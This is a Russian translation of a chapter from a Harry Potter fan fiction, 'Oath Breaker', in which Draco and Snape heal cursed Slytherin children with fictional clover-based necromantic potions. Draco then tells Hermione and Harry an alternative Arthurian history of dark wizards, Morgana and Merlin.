Клятвопреступник (Oath Breaker)

Автор: Goblin Cat KC

Перевод: Weis

Бета: atenas

Оригинал: здесь (разрешение автора на перевод получено)

Рейтинг: R (авторский; PG-15 – переводчика)

Пейринг: Драко Малфой/Гарри Поттер, Люциус Малфой/Северус Снейп

Жанр: драма/приключения

Статус: закончен

Краткое содержание: Малфои предпринимают драматичную эскападу, Драко приходится обучать Гарри темной магии, а все студенты Слизерина исчезают.

Глава 13

Сидя на лестнице у выхода из гостиной, Драко смотрел на спящих. От привычек вообще нелегко избавляться, а от вызванных жизненной необходимостью – тем более. Его слизеринцы, скорее всего, смогут спать каждый в своей постели только через несколько дней. Несколько месяцев они провели вместе, тесно прижимаясь друг к другу ночами, чтобы сохранить тепло во время снегопадов и уберечься от внешних опасностей, и пока не были готовы разойтись по разным комнатам. Вместо того чтобы принести в гостиную кровати, они сдвинули мебель к стенам, отлевитировали в середину комнаты матрасы, подушки и одеяла и устроились одной большой кучей, малыши под боком у старших студентов.

Пэнси даже велела выстроить диваны между ними и дверью, вроде первого рубежа обороны. Драко слышал, как она говорит Теду, который, похоже, стал ее главным помощником, где нужно их поставить, чтобы они послужили укреплением, если кто-то вызнает пароль и попытается атаковать. Драко показалось, что это уж чересчур, особенно учитывая то, что он еще не успел рассказать о нападении на него прошлой ночью. Впрочем, ему не очень-то хотелось об этом рассказывать. Но если забыть про паранойю, на диване Пэнси все же будет намного удобнее, чем на матрасе, пусть даже парящем в нескольких дюймах над полом.

«Они наверняка проспят до следующего утра», - подумал Драко. У него самого от недосыпания разболелась голова, но юноша сомневался, что сможет хотя бы задремать. Только что прозвонил колокол, зовущий студентов на завтрак. Драко боялся заснуть и обнаружить потом, что возвращение друзей ему просто приснилось. Он облокотился на каменные ступеньки позади себя и внимательно оглядел спящих. Помимо всех слизеринцев, Пэнси удалось привести детей из семей, никогда не выходивших из укрытия, даже чтобы послать своих малышей в школу. Они лежали, уютно устроившись подле Трейси и Дафны. Драко узнал нескольких ребятишек из семей Авенсов, Ското и Прэватов, и даже заметил парочку из рода Дано, который спрятался настолько хорошо, что в министерстве думали, будто он вымер много поколений назад.

Пэнси собрала всех. Поразительно. Склонив голову, Драко смотрел, как они спят. Скоро ему придется рассказать о том, какие опасности подстерегают их в Хогвартсе, и о том, что всей школе теперь известно, кто он. Но это может подождать.

Поднявшись, он осторожно прошел мимо спящих в свою комнату. Закрыл дверь, вытащил медовый амулет из ящика и подошел к кровати Винсента. Тот был настоящим скопидомом и никогда ничего не выбрасывал. У него в тумбочке вечно валялись какие-то камешки, клочки ткани, пуговицы, сломанные каблуки и прочий бесполезный хлам. Заглянув в его ящик, Драко принялся копаться там, пока не нашел тонкий кожаный шнурок, когда-то служивший завязкой для рубашки. Обвязав им горлышко пузырька, юноша закрепил кончики заклинанием так, чтобы узел не развязался. Надев амулет на шею, он спрятал его под одежду. Стекло сразу согрелось. Потрогав крохотный виал сквозь мантию, Драко улыбнулся.

Дверь открылась, и юноша вздрогнул от неожиданности.

- Вот ты где, - произнес Снейп. – Я думал, ты спишь, как и остальные.

Покачав головой, Драко задвинул ящик и повернулся к крестному.

- Не могу заснуть. И потом, ты же видел, как они спят. Они через многое прошли без меня, сейчас мне там не место.

- Так только кажется, - возразил Северус. – Прошлой ночью они напоминали заблудившихся малышей, наконец-то нашедших свою матушку.

- Но ведь это Пэнси… - начал было Драко.

- Да, Пэнси привела их сюда, защищала их в пути, направляла и, думаю, даже убивала ради них, словно мать. Но, несмотря на это, появившись здесь, она ждала, чтобы ты сказал ей, что делать.

- Это она говорила, кому и что делать, а не я, - упрямо возразил Драко.

- Только после того, как ты убедился, что они все поели, прежде чем отправить их спать. После того, как ты сам отвел пострадавших в лазарет и велел ей собрать остальных в гостиной, - сердито посмотрел на него Северус. – Ты что, не заметил?

- Но я не говорил им, что делать! Когда я вынудил министерство исполнить мои требования, все было совсем не так! - запротестовал Драко. – Даже раньше, когда мы вместе запугивали остальные факультеты, все было по-другому.

Судя по взгляду, которым наградил его Северус, Драко не понимал чего-то очень важного, но Мастер зелий не стал спорить.

– Что ж, рано или поздно ты научишься понимать такие вещи. А может и нет. Но раз уж ты не собираешься спать - пойдем, поможешь мне с детьми в лазарете.

– Что-то случилось? – взволнованно спросил Драко. – Им стало хуже?

– Помфри ими занимается, – отозвался Мастер зелий, и по его тону было ясно, что именно он думает о способностях школьной медсестры. – Но я бы предпочел наши методы. Она может сделать только то, что дозволено министерством.

По пути в лазарет Снейп зашел в лабораторию, взял сверток с ингредиентами и вручил его Драко. Тот ничего не сказал, но за спиной наставника скорчил недовольную гримасу.

Студенты уже разошлись по классам, и коридоры были пусты. Не застав в лазарете мадам Помфри, слизеринцы вздохнули с облегчением. Дети, которых настигло задыхательное проклятье, находились в дальнем конце комнаты, а их кровати были отгорожены ширмами. Дыхание вырывалось у них из груди короткими хрипами, а любая пыль вызывала приступы кашля. На столе медсестры стояла бутыль с легочной микстурой, явно не приносившей детям облегчения.

Остановившись у первой постели, Драко развернул сверток с ингредиентами и удивился, обнаружив два крошечных горшочка с клевером. Порой им с Северусом  требовались совершенно свежие ингредиенты, но сейчас это означало, что понадобится еще и кровь.

– Мы будем готовить «Дыхание клевера»? – решил уточнить он.

- Да, но вместо листьев используем дух. Я сам этим займусь. Ты пока возьми у них кровь. Понемножку будет достаточно.

Юноша кивнул и поставил на каждую тумбочку по виалу. Используя кровь пострадавшего, можно гораздо лучше «подогнать» зелье под его нужды, но никому больше оно не подойдет – окажется или слишком сильным, или совершенно неэффективным. Только близкие родственники без вреда для себя могут воспользоваться зельями, содержащими кровь пациента.

Склонившись над девочкой, лежащей на первой кровати, Драко вытащил ее руку из-под одеяла. Вены четко выделялись на бледной коже. Прижав кончик палочки к сгибу локтя, он прошептал:

Stoabim, – последовала вспышка, и на руке девчушки появился небольшой надрез. Юноша направил потекшую кровь в виал, и когда он наполнился, произнес: – Haean, – через секунду кровотечение остановилось, и порез зажил без следа. На руке не осталось ни шрама, ни следов крови.

Драко повторил это дважды. Когда Северус закончил первое зелье, Малфой стоял возле последней постели, на которой лежал незнакомый ему мальчик. Нахмурившись, Драко присмотрелся к его руке, но как ни старался, не смог разглядеть вену. Вздохнув, он нагнулся и прижал пальцы к шее малыша, ища пульс. Глаза мальчика распахнулись, и от неожиданности Драко резко выпрямился. Затуманенный карий взгляд быстро обежал стены, потолок и остановился на Драко. По глазам малыша юноша понял, что ему приснился кошмар, и теперь он пытается придумать, как отсюда выбраться.

– Все в порядке, – он положил руку ребенку на плечо. – Вы добрались до Хогвартса, но в тебя попало проклятье. Мне нужна твоя кровь, чтобы снять его.

Тот прищурился.

– Сес… сестра… – начал было он, но закашлялся.

– Не надо разговаривать, – сказал ему Драко, когда кашель прекратился. – Все, кто был с Пэнси, добрались благополучно, так что чем скорее я возьму у тебя кровь, тем скорее ты увидишься с сестрой.

Они оба знали, что у мальчишки не было выбора, но то, что Драко поговорил с ним, позволило ему почувствовать себя не таким уязвимым. Он молча повернул голову, давая юноше доступ к шее, и стал смотреть, как Мастер зелий занимается пострадавшей девчушкой, вливая ей в рот зелье, похожее на жидкий дым. Та даже не проснулась, но ее дыхание сразу стало более глубоким и спокойным.

Брать кровь из вены на шее всегда непросто. Чтобы лучше видеть, Драко склонился так низко, что его волосы коснулись лица ребенка. Он сделал надрез и сразу же поймал кровь, почувствовав мимолетное удовлетворение оттого, что ни капли не пролилось на простыни. Поглядев на мальчика, он заметил, что тот снова уснул. Проклятье проклятьем, но они все слишком сильно устали.

Вдруг раздался резкий шепот, от которого сердце замерло у Драко в груди.

- Прочь от них! – приказала Помфри, наставив на них с Северусом палочку, и сердито поджала губы.

Чертыхнувшись про себя, юноша сжал виал так сильно, что тот едва не треснул. Он так сосредоточился на своем занятии, что не услышал, как вошла медсестра. Разумеется, она тут же решила, что они собирают кровь невинных для своих гадких зелий и собираются использовать беспомощных детей для некромантии. Внезапно осознав, что отчасти она права, Драко не удержался и хмыкнул.

- Нападать на детей – это, по-твоему, забавно? – рыкнула ведьма. – Мало тебе было тех, на кого ты наслал чуму и поджарил молнией, теперь вы принялись за своих?

- Экспеллиармус, - спокойно произнес Северус, подхватил ее палочку и положил ее на тумбочку. – Вы прекрасный целитель, но, боюсь, совсем не знаете, как лечим мы.

Нисколько не смутившись, Помфри схватила стоящую рядом большую банку с рябиной. Драко скривился. Он ни секунды не сомневался, что она знает, как превратить безобидные на первый взгляд ярко-красные ягоды в оружие против темных магов.

- Если вы бросите их, - мягко произнес Снейп. – то повредите и детям. Они такие же, как мы. Уверяю, мы не делаем им ничего плохого.

Помфри застыла, запустив одну руку в банку, с подозрением посмотрела на детей и обратно на Мастера зелий, явно размышляя, как поступить.

- Ну а что же вы делаете? – наконец, мрачно спросила она.

- Ваши зелья действуют слишком медленно, - ответил Северус. – Мы можем вылечить ваших пациентов гораздо быстрее.

- Значит, ничего плохого? – снова спросила ведьма. – Так почему вы не сказали, что собираетесь сюда? Зачем вам их кровь? И что за дым ты заставил ее вдохнуть?

- Я ничего не сказал раньше, потому что не хотел тратить время на препирания, - неохотно объяснил Снейп, явно недовольный своей оплошностью. – А если интересно, что мы делаем – оставайтесь и смотрите. Сомневаюсь, что министерство когда-нибудь позволит вам увидеть некромантию в деле.

- Некромантия! – ахнула медсестра. – О, Мерлин, но ведь они живы!

- Причем тут дети? - удивился Мастер зелий. – Мы применим ее не к детям, а к растениям.

Помфри неохотно закрыла банку с рябиной и поставила ее на стол. Не уверенная в безобидности их намерений, она осторожно подошла к Драко и стала наблюдать за его действиями. Юноша залечил порез на шее мальчика и запечатал виал с кровью. К их общему облегчению, никто из детей не проснулся.

- Неужели они все темные маги? – недоверчиво прошептала ведьма. – Они слишком маленькие…

- Достаточно большие, чтобы суметь выжить поодиночке, - пробормотал Драко. Указав на девочку, которую только что вылечил Северус, он добавил: - Она не темная, но ее окружало столько темной магии, что рябина причинила бы вред и ей.

Помфри оглядела пациентов, а потом с отвращением посмотрела на Драко. Малфою показалось, что сейчас она начнет ругать его за то, как он обошелся с напавшими на него прошлой ночью, но она только вздохнула и повернулась к Северусу. Тот уже закончил со вторым пациентом и теперь поставил на стол между собой и Помфри клевер.

- Всем хорошо известно, что темные маги искушены в некромантии, - начал Мастер зелий менторским тоном.– Но мало кто знает, что некромантия - это не просто вызывание духов умерших, а умение забирать жизненную силу у любого создания природы. В старом дубе намного больше такой силы, чем в человеке, и даже в маленькой травинке есть дыхание жизни, пусть самое незначительное. И именно это делает наши зелья такими действенными, чего вашим вряд ли когда-нибудь удастся достигнуть, - он семь раз, как будто бессмысленно, обвел кончиком палочки вокруг клевера, с каждым витком поднимая палочку выше, и повторил это еще трижды, с началом последнего витка приговаривая что-то напевное. Когда он закончил говорить, от растения отделился светло-зеленый дымок и последовал за палочкой к склянке с зельем. Мастер зелий закупорил и встряхнул виал, а Помфри наклонилась ближе и пригляделась к растению. Она ожидала увидеть засохший клевер, но обнаружила, что стебель лишь неестественно искривлен, листья поникли, а часть корешков вылезла из земли, будто растение забыло, как оно должно расти.

- Северус забрал не всю его жизнь, а совсем чуть-чуть, - объяснил Драко - Клевер очень выносливый, гораздо более выносливый, чем другие растения. Потеряв немного жизненной силы, он просто начинает расти немного странно.

- Но он еще живой, - удивилась Помфри. – Какая же это некромантия, если растение не умерло?

- Некромантия не обязательно предполагает смерть, - произнес Северус. Осторожно просунув руку под голову ребенка, он влил зелье ему в рот. – Это магия духов, а духи существуют до и после смерти. Но министерство все равно приговорит всякого, кто практикует любую из ее форм.

- Потому что если такое можно сделать с растениями, - вслух подумала Помфри, – то и с человеком тоже.

- Именно, - Мастер зелий отставил пустой виал и принялся за следующую порцию. – Драко, ты мне больше не нужен. Забери все лишнее и отнеси в мою кладовую.

- Да, сэр, - собирая использованные бутылочки и оставшиеся ингредиенты, юноша оглянулся на наставника. – Мне нужно идти на занятия?

- Нет, лучше поспи. И держись подальше от неприятностей. Предполагается, что тебе ничего не угрожает, но я бы не очень на это рассчитывал.

Кивнув, юноша обошел Помфри, стараясь не подходить слишком близко, и направился к дверям. Медсестра мрачно посмотрела на него, но ничего не сказала. Драко знал - она все еще сердится на него за то, что он сделал с нападавшими. Он понадеялся, что ему не придется приходить в лазарет одному. Вряд ли, конечно, она причинит ему вред, но ему надоело постоянно защищаться и оправдываться.

Повесив сумку в кладовую и расставив ингредиенты по местам, он решил пойти в библиотеку. Сейчас там никого не должно быть, и значит, никто не станет таращиться на него или задавать дурацкие вопросы.

Когда он вошел, мадам Пинс злобно посмотрела на Драко, но ничего не сказала. Он чувствовал на себе ее взгляд, пока не вошел в Запретную секцию. Пройдя к полкам с книгами о темной магии, в надежде найти что-нибудь, чтобы состряпать достоверную историю для особо любопытных, Драко с удивлением заметил, что половина книг исчезла. Оставшиеся в беспорядке лежали на полках, и то здесь, то там валялись забытые кем-то листы пергамента. Подняв один, Драко увидел, что это список книг со словом «темный» в названии.

«Кому понадобилось их читать?» – удивился юноша. Хаффлпаффцам, чтобы попытаться его понять, или равенкловцам, чтобы как следует подготовиться к противостоянию? Взяв книгу, которая никого не заинтересовала – «Ядовитые яблоки Морганы» - он уселся возле окна.  Подавив зевок, потряс головой, отгоняя сон, и начал читать.

Кто-то вошел в библиотеку, но юноша не стал обращать внимания, пока этот кто-то не подошел к его столу. Подняв взгляд, Драко увидел, что возле него остановилась Грейнджер с внушительной стопкой книг в руках. Увидев, что он читает, девушка пробормотала:

- Я думала, яблоки отравил рыцарь, чтобы отомстить Гавейну.

- Слуги Морганы могли действовать чрезвычайно тонко, - уклончиво ответил слизеринец, недоумевая, что могло понадобиться всезнайке. – Артуру так хотелось доказать невиновность Джиневры, что он довольствовался бы и менее правдоподобным объяснением.

- Но ведь она и была невиновна, - пожала плечами девушка.

- Только в отравлении, - произнес Драко. – Она все равно была неверной женой и потаскушкой. Откуда такой интерес?

Грейнджер стояла, неловко переминаясь с ноги на ногу. Нервно оглянувшись через плечо, она ответила:

- Я решила кое-что почитать по магической истории, но там все так поверхностно, а некоторые факты не стыкуются с остальными.  

- Такое случается, если излагается только одна версия событий.

Девушка нахмурилась и поудобнее перехватила книги, чтобы не упали.

- Я хочу знать больше. Но в здешней библиотеке я не нашла ничего стоящего.

Драко поднял голову.

- Ты что, прочитала все?

- Почти, - сочтя это разрешением присоединиться, она положила книги на стол и уселась, поставив сумку на пол. Та опустилась с глухим стуком. – Я не смогла найти «Камллан и последствия» и кто-то раньше меня взял «Королеву Горры». Всю секцию о Камелоте тоже разобрали. Равенкловцы опустошают библиотеку, как саранча.

Драко едва сдержал усмешку, вспомнив, как сам сказал Блейзу что-то подобное, когда пытался найти нужную книгу для сочинения.

- По крайней мере, в отличие от большинства, ты пытаешься найти что-то посущественнее.

Открыв книгу, лежащую сверху ее стопки, он прочел название: «Нарушенные клятвы и проклятья». Драко хмыкнул. Давненько ему не приходилось слышать эти обвинения.

- Так чего ты хочешь, Грейнджер? Сомневаюсь, что тебе просто нужна моя компания.

- Я поинтересовалась у Дамблдора, но он сказал, что темные маги передают знания устно, и если я хочу что-то узнать, мне следует спросить кого-нибудь из них. Вот я и спрашиваю.

Разрываясь между воспоминанием о том, как она кричала на него, и уверениями Гарри, что она помогла убедить остальных гриффиндорцев не причинять ему вреда, юноша отложил свою книгу и откинулся на спинку стула, как он надеялся, с выражением отвращения на лице.

- Боюсь, мне надоело, что на меня кричат, поэтому если ты думаешь, что я вот так запросто выложу тебе нашу историю, и ты еще раз сможешь объяснить мне, какие мы злые…

- Обещаю, что не буду кричать, - раздраженно сказала девушка, с досадой  вспомнив, как летала вверх тормашками над его летописью. – И говорить, что вы злые, тоже.

Драко бесстрастно посмотрел на нее.

- Пожалуйста, Малфой, - процедила она сквозь зубы. – Или ты предпочитаешь, чтобы я поверила тому, что пишут в книгах?

Слизеринец вздохнул и поглядел на потолок, подавив зевок. Ему было абсолютно все равно, что думает Грейнджер, но Гарри прислушивается к ней. Может, если он расскажет ей их версию истории, это послужит ему на пользу?

- Ладно.

Раздался шелест пергамента – девушка торопливо достала свои заметки.

- Спасибо. Итак, я не поняла довольно многого, но в первую очередь – что связывало Моргану и Артура?

- Что тут непонятного? Она была его сводной сестрой.

- Но почему она так его ненавидела? Я читала о том, что она сделала, но нигде не говорится, почему она пошла на это.

Прежде чем ответить, Драко глубоко вздохнул.

- Потому что Артура поддерживал Мерлин – могущественный волшебник, ненавидевший темных магов. Он убивал любого из нас, кому не посчастливилось встать у него на пути, чтобы укрепить свою власть в Британии, и довольно быстро настроил против нас Камелот. Большинство наших сбежало в Горру, под защиту Морганы, потому что она была достаточно сильной, чтобы противостоять Мерлину.

Гермиона ошеломленно смотрела на него.

- Я никогда не читала ничего подобного, ни в волшебной, ни в маггловской литературе.

- Естественно. Какой смысл писать о том, что мы сделали, если мы приложили столько усилий, чтобы сохранить это в тайне? Если бы Мерлин знал, что мы ушли в холмы, он бы постарался выследить нас, а не тратил время, помогая утеровскому ублюдку.

- Но почему? Я имею в виду - почему он ненавидел темных магов?

Драко пренебрежительно взмахнул рукой.

- К тому времени различия между темной и светлой магией стали так очевидны, что я был бы удивлен, встретив кого-то из ваших, кто не ненавидел бы нас. Мы использовали магию, которую магглы и вы считали злой и отвратительной, мы не подчинялись вашим прихотям. Но вас и магглов всегда было больше, так что ход войны быстро обернулся не в нашу пользу.

- А Мерлин любил магглов настолько, что создал для их защиты свой Орден, - тихо договорила девушка, рассуждая сама с собой. – Но зачем он начал помогать Утеру?

- Чтобы избавиться от нас раз и навсегда, - Драко взял одну из книг и начал листать, равнодушно скользя взглядом по средневековым гравюрам, на которых ведьмы развлекались со спящими мужчинами, пока их жены спали рядом. – Ты должна понять, что в те времена большинство магглов еще верило в фей и ночных чудовищ. Они верили, что все волшебники сродни могущественным богам и силам природы.

- Они вас боялись, - понимающе кивнула девушка.

- Они трепетали перед нами, - поправил ее Драко. – Мы защищали границы волшебного мира, не позволяя ему смешиваться с маггловским, и если для этого требовалось заколдовать или убить маггла, мы не колебались.

- Но Мерлину это не нравилось, - продолжал юноша. – Его злило, что мы предпочитаем держаться подальше от магглов. Он, а за ним и другие волшебники, считал, что наше господство над магглами – неправильно, что они не животные, которыми надо управлять. Кроме того, вы избегали любых контактов с волшебными созданиями и поэтому нас, искавших этих контактов, избегали тоже. Светлые косо смотрели на то, что мы по-дружески общаемся с исконными обитателями этих земель. Мерлин думал, что время древних богов подходит к концу, и люди теперь являются истинными хозяевами этого мира.

От его резкого тона Гермиона поморщилась.

- Но разве темные маги не могли призвать на помощь своих богов, чтобы те помогли им бороться с Мерлином и светлыми магами?

- Нет, - огрызнулся Драко. – Потому что старый мерзавец был прав – феи и древние  духи постепенно исчезали из этого мира, исчезали навсегда. Конечно, кое-где они еще оставались, но это совсем не то, что было раньше. Мы старались исполнить наш долг, приводили в порядок покинутые ими места, уничтожали ловушки и места силы, дышащие их магией. Поняв, что они ушли, мы начали думать, что делать теперь, когда нам стало нечего защищать, и вот тут-то Мерлин послал Артура с его рыцарями истребить нас.

- Я думала, они отправились доказать свою доблесть, - задумчиво сказала девушка. – Хотя я всегда удивлялась – почему до нас дошло так мало историй об их подвигах, когда рыцарей было так много?

- Потому что даже поэтам трудно возвышенно описывать, как вырезают целые семьи. Когда мы поняли, что происходит, то устремились в Горру, надеясь, что королева защитит нас.

- Королева Моргана? И она защитила?

Драко улыбнулся, вспомнив.

- Не просто защитила. До того как прийти к ней, мы были всего лишь разрозненными семьями, живущими сами по себе, практикующими свою магию и объединенными лишь общим долгом. Под ее защитой мы узнали о могущественных заклинаниях, о зельях ее изобретения. Темные маги по природе своей одиночки, но она научила нас работать вместе. Она превратила нас в сообщество, которое со временем стало достаточно сильным, чтобы поддержать Мордреда.

- Ты говоришь так, будто сам там был.

- В каком-то смысле я был, - Драко не знал, рассказал ли ей Гарри о снах, но, скорее всего, рассказал. – Поттер говорил тебе о моих снах?

- Про твоих предков? Да, - кивнула она.

- Иногда, умирая, они вспоминали Моргану. Всегда мимолетно и всегда такой, какой хотели ее помнить, а не какой она была на самом деле. По крайней мере, мне так кажется.

- Почему?

- Потому что человек из плоти и крови не может быть так красив.  

Девушка открыла было рот, но тут прозвонил колокол. За дверью зазвучали голоса студентов. Драко и Гермиона обернулись туда, но никто не вошел, и через некоторое время они расслабились.

– В книгах почти ничего не говорится о том, как она выглядела или что делала, когда не строила козни Артуру. Вышла ли она замуж, или у нее были любовники? И были ли у нее дети?

- Мы не знаем, - Драко поколебался. Мы даже не знаем наверняка, был ли  Мордред ее сыном. У нас были века, чтобы подумать о ней и о том, что она сделала. Кое-кто из наших считает, что она вообще не могла иметь детей, потому что была дочерью смертной женщины и духа. Это могло бы объяснить, почему по силе она была равна Мерлину. Как бы там ни было, никто не знает мотивов ее поступков. Она приняла темных магов, противостояла Артуру, поддерживала Мордреда, и все это исходя из каких-то своих соображений. Вряд ли она делала все это только чтобы защитить нас.

– Но почему волшебники поддерживали Мордреда? – полюбопытствовала Гермиона. – Он же был магглом.

- Ничего подобного, - покачал головой Драко. – Он был настоящим Темным лордом, наследником Морганы, и клятвы, которые мы принесли ей, сделали и его нашим родичем.

- Гермиона, Малфой!

Оглянувшись, они увидели, как к ним направляется Гарри, сворачивая и убирая в сумку какой-то пергамент. Мадам Пинс шикнула на гриффиндорца, но он, не обратив на нее никакого внимания, взял стул от соседнего стола и уселся рядом.

- Не ожидал найти вас вместе, - заметил он. – Особенно во время уроков.

- Я ушла вперед по арифмантике, - оправдываясь, заявила девушка. – Здесь я могу узнать намного больше. Малфой рассказывает о Мордреде.

- Что за Мордред?

Гермиона и Драко ошеломленно поглядели на него.

- Что? – хмуро спросил Гарри. – Ну, извините, я не читал того, что читали вы!

- Гарри, в самом деле!

- Я спрашивал каждого из вас раньше, - огрызнулся тот. – И никто мне так ничего и не объяснил.

- Ладно, - сказал Драко. – Вкратце, чтобы ввести тебя в курс дела: ты знаешь о короле Артуре, Мерлине, рыцарях Круглого стола и Камелоте?

- Конечно, об этом все знают.

Гермиона закатила глаза, а Драко продолжил:

- Мерлин помог отцу Артура, Утеру, а после его смерти воспитывал Артура, пока тот не вступил на престол. Позже у Артура появился незаконнорожденный сын от его сводной сестры, Морганы. В конце концов мальчик – Мордред – стал рыцарем в Камелоте. Однажды он рассказал всем о том, что у королевы Джиневры любовная интрижка с Ланселотом, и в конечном счете сумел доказать, что это правда. Артур со своими верными рыцарями отправились приструнить Ланселота, а Мордред тем временем захватил королевство. Когда Артур вернулся, завязался бой, в котором все они погибли.  

- Кроме сэра Бедевера, - встряла Гермиона, и добавила для Гарри: – Самого верного рыцаря Артура.

- Нет, мы прикончили его через несколько дней, - возразил Драко. – Важно другое. Дело было сделано: Камелот был разрушен, а Артур – мертв. Но на стороне светлых магов было численное превосходство, так что нам пришлось несладко. Много наших погибло, а выжившим пришлось затаиться. Кое-кто вернулся к Моргане, но большинство предпочли спрятаться в лесах.

- Подожди, - остановила его Гермиона. – Как они могли вернуться к Моргане? Артура на Авалон сопровождали три женщины – Джиневра, Дева Озера и Фея Моргана.

- Все зависит от того, кто рассказывает историю, - покачал головой Драко. –Джиневру к тому времени уже давно отправили в монастырь. Вместо нее рядом с Девой Озера находилась третья сестра Артура, Элейн. И объясни мне, Грейнджер, - сказал он, увидев, что девушка засомневалась, - зачем Моргане сопровождать Артура на Авалон, если она без конца строила ему козни?

Нахмурившись, Гермиона немного подумала и, наконец, сказала:

- Если честно, это всегда казалось мне несколько странным.

- Потому что этого не было, - кивнул Драко. – С ним отправилась не Моргана, а Нимуэ.

- Нимуэ? – переспросила Гермиона. – Я никогда о ней не слышала.

- Но ты наверняка слышала о Вивьен, - пожал плечами слизеринец, и внезапное понимание на лице гриффиндорки подтвердило его слова. – Одна женщина, два имени – под одним ее знали мы, другое ей дал Мерлин. Ее часто путают с Девой Озера и со временем, приличия ради, на ее место поместили Моргану.

Гарри в замешательстве переводил взгляд с Драко на Гермиону.

- О чем вы говорите?

- Вивьен была любовницей Мерлина, - поспешила отмахнуться Гермиона, словно ее только что осенила какая-то догадка, а разговоры ее отвлекали. – Она соблазнила его и пленила в куске янтаря. Но зачем ставить Моргану на место Вивьен?

– Потому что Нимуэ, ко всему прочему, была матерью Мерлина, - объяснил Драко. – И когда он стал всеобщим любимцем и примером для подражания, все притворились, что этой кровосмесительной интрижки никогда не было. Поэтому в легендах Моргану поместили на место Нимуэ, рядом с Артуром, пытаясь убедить темных магов, что в конце она забыла свою веру и примирилась с ним.

- Погоди-ка, - остановил его Гарри. – Зачем называть одну и ту же женщину двумя разными именами?

Пока девушка объясняла ему про римских захватчиков, местные наречия и английские истории, пересказанные по-французски, Драко откинулся на спинку стула и покачал головой.

- Нет, Грейнджер, - мягко перебил он ее. - Все гораздо проще.

Он посмотрел на Гарри со смесью печали и досады.

– Ее называют более популярным именем потому, что книги по истории написаны победителями. В битве при Камллане было потеряно больше, чем надежды Мордреда на трон. Мы всегда плохо ладили с остальными, а после гибели Мордреда темные маги вообще покинули общество волшебников и скрылись. Травля на нас шла веками, и теперь нас осталось очень мало.

– Сколько? – спросила Грейнджер.

– В Британии – чуть больше пятидесяти семей, - Драко посмотрел на Гарри. – Ты однажды сказал, что Малфои перешли на другую сторону только потому, что оказались в опасности. Что мы темные маги, и ничто не изменит этого.

Гарри кивнул.

– Ты был прав. Если бы нынешний Темный лорд не оказался безумцем, одержимым собственной смертностью, если бы у нас была хоть какая-то надежда взять верх над министерством, я служил бы ему даже более преданно, чем мой отец когда-то.

– Почему? – спросил Гарри. – Его не заботит никто кроме него самого.

– Ты не понимаешь, что стоит на кону, – покачал головой Драко. – Битва между Мерлином и Морганой еще не окончена. Эта новая война была нашим шансом, может быть, последним, обернуть все в нашу пользу. Министерство разжирело и обленилось, мы могли бы уничтожить его. Да, это отбросило бы наше общество на несколько столетий назад, но…

– Но что? – перебил его Гарри. – Вы могли бы сравнять счет? Одержать верх в битве, что началась сотни лет назад? Какой в этом смысл? Это злобно и мелочно.

– Если бы мы выиграли, облавы бы прекратились, - горячо сказал Драко. – Авроры больше не врывались бы в наши дома и не крали бы семейные реликвии под предлогом, что это темномагические артефакты. Нашим семьям не пришлось бы бояться, что ночью к ним придут и без суда заберут в Азкабан, где они сгинут навеки. Мы могли бы колдовать без страха, что нас закидают камнями или распнут, или… - он осекся и глубоко вздохнул, пытаясь успокоиться. – Да, этой битве несколько сотен лет и она все еще продолжается. Она не закончится, пока жив хоть один последователь Морганы. То есть пока жив я, моя семья и остальные темные маги.

- Но как же… – растерянно сказала Гермиона. – Я думала, авроры арестовывают только опасных колдунов, тех, кто пытается навредить остальным.

- Серьезно? – Драко посмотрел на Гарри –  И кому же ты пытался навредить, когда тебя судил Визенгамот?

- Откуда ты узнал об этом? – с подозрением спросил Гарри. – Знали всего несколько человек…

- Малфои очень хорошие политики, - ответил Драко. – Ты удивишься, сколько всего можно вытянуть из человека, когда тебя боятся.

- Подожди-ка, а что насчет Дрянн-аллеи? – встрепенулся Гарри. – Почему авроры не устраивают рейдов по тамошним магазинчикам?

- Потому что хозяева этих магазинчиков не выставляют свой товар напоказ. Нужно знать, о чем спрашивать. Еще важнее знать, как спрашивать. Авроры могут рыскать там днями напролет и, поверь мне, так они и делают, да только без толку. Хотя они уже уничтожили немало наших артефактов. Большую часть наших книг сожгли, и любая мало-мальски значимая информация удалена из ваших.

Пока Драко говорил, Гермиона вытащила книгу из стопки и принялась торопливо ее листать, пока не нашла страницу, половина которой была оторвана. Девушка показала ее слизеринцу.

- Вот, я как раз вспомнила. Ты не знаешь, чего здесь не хватает?

Драко наклонился и вслух прочел несколько последних предложений у оборванного края.

«Много тайн и секретов скрыто в землях Королевы. В королевстве Горра процветают странные извращения. Границы страны охраняют растения, которые растут против веления природы – корнями наружу, а листьями в землю. Животные там умны почти как люди. Но настоящие ужасы начинаются с наступлением темноты, когда последователи Феи Морганы взлетают в воздух и воздают почести луне. Немногие видели их празднества и выжили, чтобы рассказать о чудовищных криках и о том, что творится в ночи…» - тут страница обрывалась.

- Хоть что-нибудь из этого правда? – спросила Гермиона.

- В любой лжи есть крупица правды, - ответил Драко. – Да, большая часть – правда. Растения, которых коснулась темная магия, начинают выглядеть немного необычно.

- А животные?

- Темные маги любят скрещивать виды, - объяснил слизеринец. – Магия бывает довольно непредсказуема, так что никогда не знаешь, что получишь в итоге. Светлые маги, наоборот, недолюбливают животных-полукровок.

- Косолапсус – полукровка, - возразила девушка.

- Да, и сколько времени он провел в магазине, прежде чем ты его купила? – Драко не ждал ответа. Указав на книгу, он сказал: - Ты хотела знать, чего там не хватает? Кто бы ни оторвал страницу, он не любил упоминаний о Вальпургиевой ночи. Наверное, это случилось несколько веков назад. Тогда много говорили о том, что надо избавиться от любой информации, которая могла бы впечатлить бунтарски настроенных подростков и подбить их на эксперименты. 

- Почему Вальпургиева ночь такая особенная? – спросил Гарри. – Ты говорил, что Пожиратели изначально были Рыцарями Вальпургии, верно?

- Вальпургиева ночь – это то же, что и Бельтана, разве нет? – спросила Гермиона. – Они совпадают по времени – обе даты примерно посредине между равноденствиями.

- Я не знаю, как это называют магглы, - пожал плечами Драко. – И вы обычно это не празднуете. Для нас же это одна из ночей, когда мы стоим на страже, когда древние боги могут проникнуть в этот мир. Даже после их ухода мы продолжали собираться в это время года просто по традиции. Так появились Рыцари Вальпургии.

Грейнджер уткнулась в книгу, а Драко отвернулся и постарался подавить зевок. Ему это не совсем удалось, и когда он повернулся обратно, то обнаружил, что Поттер смотрит прямо на него.

- Ты же с ног валишься от усталости, - сказал гриффиндорец, заметив темные круги у Драко под глазами. – Ты вообще спал?

